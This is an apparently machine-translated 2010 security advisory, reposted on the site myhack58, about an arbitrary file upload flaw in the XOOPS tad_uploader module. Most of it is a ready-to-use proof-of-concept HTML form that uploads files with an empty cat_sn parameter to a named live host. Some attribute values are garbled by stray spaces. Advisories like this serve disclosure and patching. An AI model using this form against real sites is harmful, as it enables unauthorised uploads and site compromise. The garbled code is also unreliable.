xoops tad_uploader module upload vulnerability-vulnerability warning-the black bar safety net

2010-06-17T00:00:00
ID MYHACK58:62201027260
Type myhack58
Reporter 佚名
Modified 2010-06-17T00:00:00

Description

Xoops is a very popular dynamic web content management system, with object-oriented PHP to write.

xoops tad_uploader module cat_sn parameter space can be arbitrarily upload files to the uploads/tad_uploader/directory.

Test code:

<FORM action='http://www.hackqing.cn/modules/tad_uploader/index.php' method='POST' enctype='multipart/form-data'> <p><b>from hard disk Upload File:</b><input type='file' name='cc_file[0]' size='2 0'></p> <p><b>directly from the Internet:</b><input type='text' name='cc_file_url' size='3 0'><br>( <b>file description</b><br><textarea name='cf_desc[0]' cols=5 0 rows=3 style='width:1 0 0%'></textarea> <input type='hidden' name='cat_sn' value=' '> <input type='hidden' name='op' value='replace_data'> <input type='submit' value='send'> </FORM>

The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version:

http://xoops.sourceforge.net